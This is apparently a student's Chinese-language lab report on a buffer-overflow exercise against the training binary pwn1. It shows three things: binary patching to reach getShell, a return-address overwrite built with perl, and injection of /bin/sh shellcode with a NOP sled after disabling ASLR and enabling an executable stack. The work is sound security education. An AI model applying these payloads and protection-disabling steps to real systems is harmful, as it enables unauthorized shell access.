1. 实践目标
本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。
2. 实践内容
2.1 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
第一步:使用
objdump -d pwn1 | more
命令对实验给定的可执行文件进行反汇编操作,找到主函数位置并定位其调用foo函数的机器指令及相对地址如图:
第二步:
我们还可以在反汇编状态下看到getShell代码段的起始地址
接下来我们要做的就是把原可执行文件中的foo函数调用地址改为getShell函数的调用地址。
第三步:
先用cp pwn1 pwn2拷贝命令把原文件辅助一份,以防出现不可逆修改还得导一份文件进来。vim编辑器打开pwn2来看看,看其中有神马内容。
会发现特别乱,看着眼睛花
第四步:
打开发现这文件中并没有人类可以看懂的语言,那么我们在编辑器命令行中敲入
:%!xxd命令,以16进制代码的形式进行查看,然后利用查找工具/ + 查找信息找到我们刚才反汇编时主函数调用foo的位置.
然后把它改成可以对应getShell函数的地址--->根据计算得出我们需要将d7ffffff改为c3ffffff
第五步:
改完了别忘了把16进制形式转换为原文本,使用:%!xxd -r然后:wq保存并退出编辑器
先不运行程序,我们先来反汇编看看改的结果
第六步:
可以明确的看到原本的调用foo函数已经被我们修改为了调用getShell函数,现在我们运行一下看看会发生什么。
就像是运行程序在其中打开了一个新的命令行一样,我们可以在这个命令行里做任何可进行的操作,比如秘密修改和查看其中的文件_!!当然这么简单的方法肯定是行不通的。
2.2 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
foo函数解读:
EBP和ESP是一个函数的栈底和栈顶,在子函数EBP上方是主函数的EBP, 返回地址和参数. EBP下方则是临时变量. 函数返回时作 mov esp,ebp(把esp栈顶地址给ebp,这样栈底和栈顶一样了,就丢掉栈内数值,然后 pop ebp (出栈,栈指针在子函数退出后,就指向主函数的栈顶), 然后ret 结束符,子函数就结束了
ESP 专门用作堆栈指针,被形象地称为栈顶指针,堆栈的顶部是地址小的区域,压入堆栈的数据越多,ESP也就越来越小。在32位平台上,ESP每次减少4字节。
0x1c就是预申请的栈空间,转成十进制,大小是28 字节。用来保存用户输入的,如果允许栈输入越界,用户输入就会覆盖到下一条指令的数据区,就是下一行的call指令,0x08084a8这行call调用子函数的指令,原本是输出字符串的,地址变成getShell的地址,就可以攻击的目的。
第一步:
首先再复制一个pwn1,命名位pwn3.我们使用gdb调试运行程序,然后在调试状态下输入r使得程序运行
第二步:
我输入的是八个1,八个2,八个3,七个4和数字1到8然后在调试状态下输入info r显示各个寄存器状态,这时我们可以看到由于输入字符串大于缓冲区,导致eip也就是返回地址指针位置的值已经改变了,而当前的0x35343332正好是数字5 4 3 2的ASCII码,对照我们我们输入的字符串,正好是第33到37个数字的位置正好可以覆盖程序中的返回地址,也就是说我们把这几位替换为getShel函数的对应地址就可以完成前面的操作了。
第三步:
根据前面使用反汇编看到的结果,我们知道getShell的地址为0x0804847d,然后我们只需要把这一串十六进制码前面填充32个任意字符再输入到foo 函数里就可以了,但是这时我们会发现,程序执行时是没办法输入十六进制数的,所以我们需要构造一个文件放入这些东西,然后把文件中的内容输入到程序里,这时我们用到了一个脚本语言perl,输入以下命令
perl -e 'print "11111111222222223333333344444444x7dx84x04x08x0a"' > input
第四步:
将代码和填充数据保存到一个名为input的文件中,利用cat命令和|管道执 行程序就可以得到和第一种方法一样的结果。
(cat input; cat) | ./pwn3
2.3 注入一个自己制作的shellcode并运行这段shellcode
2.3.1 什么是Shellcode?
- shellcode就是一段机器指令(code)
- 通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),
- 所以这段机器指令被称为shellcode。
- 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
2.3.2 实验准备
在老师的实验指导中给出了一段Shellcode代码的机器指令,我们就以此来做这次的实验,代码如下:
x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80
输入apt-get install execstack安装栈的相关文件
1. 输入cp pwn1 pwn4回到实验一目录,复制pwn1,将pwn4作为实验所用文件
2. 输入execstack -s pwn4设置堆栈可行
3. 输入execstack -q pwn4查询pwn4文件的堆栈是否可执行他会返回x pwn4文件名
4. 输入more /proc/sys/kernel/randomize_va_space查看地址随机化信息,返回值为2
5. 输入echo "0" > /proc/sys/kernel/randomize_va_space停用它,然后再输入more /proc/sys/kernel/randomize_va_space查询下信息,此时返回值为0
6. 此时,准备工作完成。
2.3.3 构造攻击buf
根据前面实验的结果我们知道覆盖源程序缓冲区需要的字符个数为32个,而第33到37个字节正好可以覆盖到返回地址的位置上。这样我们就可以构造一个攻击buf输入到源程序中,使得源程序返回地址变为我们注入Shellcode代码位置,我们就可以达到攻击目的。
buf格式:anything + retaddr + nops + shellcode
注:
.1.anything为32字节的任意字符,用于填充源程序中的smilbuf的
2.retaddr为跳转到shellcode代码的地址
3.nops为任意个空字符,可以作为滑行区,当retaddr中的代码使程序跳转到任意个空字符上时,都可以一直滑行到我们注入的
4.Shellcode的位置,并执行Shellcode为我们注入的攻击代码,该实验中是打开被攻击计算机的命令行
1.先根据上述构造buf,我们构造的部分为:
A(32个)+ 1234 + nop(4个) + Shellcode
2.使用perl脚本生成攻击buf的文件,文件名为input_Shellcode:
3.开启两个命令行,在一个命令行中输入
(cat input_Shellcode;cat) | ./pwn1
也就是以文件input_Shellcode的内容作为pwn1程序运行的输入,然后在另一个命令行中输入
ps -ef | grep pwn4
查询出pwn1程序运行时所使用的进程号
然后开启gdb调试,并使用attach定位程序
4.设置断点,查看注入buf的内存地址
-
先反汇编foo函数
disassemble foo,在函数执行结束处设置断点break *0x080484ae,然后c即Continuing让程序继续执行到断点处,然后我们输入info r查看寄存器状态可以看到esp中保存的指针值,然后用x/16x + 指针值来查看其中的数据 -
可以发现这个位置保存的正好是我们构造buf中的1234的ASCII码,再往后看就能看到我们的Shellcode代码,这样的话我们只需要把1234这个位置的代码改成后面任意一个nop的地址就可以完成攻击了。
-
由上图可以看到eip寄存器中保存数据的地址,该地址中保存的是第一个字节的值,所以想要跳转到任意一个nop需要在这个地址的基础上再加4。
-
修改之后再运行就可以看到我们的想要的效果了。0xffffd62c+4=0xffffd630
3. 需要掌握的内容
3.1 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
- NOP指令:“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。
- JNE指令:条件转移指令,如果不相等则跳转。
- JE指令:条件转移指令,如果相等则跳转。
- JMP指令:无条件跳转指令。无条件跳转指令可转到内存中任何程序段。转移地址可在指令中给出,也可以在寄存器中给出,或在存储器中指出。
- CMP指令:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。
该开始做什么新的事情?
3.2 掌握反汇编与十六进制编程器
反汇编主要使用的命令为objdump具体参数描述如下:
objdump -f test //显示test的文件头信息
objdump -d test //反汇编test中的需要执行指令的那些section
objdump -D test //与-d类似,但反汇编test中的所有section
objdump -h test //显示test的Section Header信息
objdump -x test //显示test的全部Header信息
objdump -s test //除了显示test的全部Header信息,还显示他们对应的十六进制文件代码
十六进制编辑器主要使用Linux的文本编辑器vim,可以在文档中输入:%!xxd和:%!xxd -r来进行十六进制的转换和恢复。
4. 实验总结
4.1. 什么是漏洞?漏洞有什么危害?
4.1.1 什么是漏洞:
漏洞即某个程序(包括操作系统)在设计时未考虑周全,当程序遇到一个看似合理,但实际无法处理的问题时,引发的不可预见的错误。系统漏洞又称安全缺陷,对用户造成的不良后果如下所述:
如漏洞被恶意用户利用,会造成信息泄漏,如黑客攻击网站即利用网络服务器操作系统的漏洞。
对用户操作造成不便,如不明原因的死机和丢失文件等。
4.1.2 为什么会存在漏洞:
漏洞的产生大致有三个原因,具体如下所述:
编程人员的人为因素,在程序编写过程,为实现不可告人的目的,在程序代码的隐蔽处保留后门。
受编程人员的能力、经验和当时安全技术所限,在程序中难免会有不足之处,轻则影响程序效率,重则导致非授权用户的权限提升。
由于硬件原因,使编程人员无法弥补硬件的漏洞,从而使硬件的问题通过软件表现。
4.1.3 总结
当然,Windows漏洞层出不穷也有其客观原因,即任何事物都非十全十美,作为应用于桌面的操作系统——Windows也是如此,且由于其在桌面操作系统的垄断地位,使其存在的问题会很快暴露。此外和Linux等开放源码的操作系统相比,Windows属于暗箱操作,普通用户无法获取源代码,因此安全问题均由微软自身解决。
4.2. 实验收获与感想
通过本次实验让我在一个新的层次上理解了网络攻击的流程,在具体的实验操作中实现了简单的缓冲区溢出攻击,在感叹它的神奇之处的同时也增长了网络安全方面的知识,感觉收获颇丰。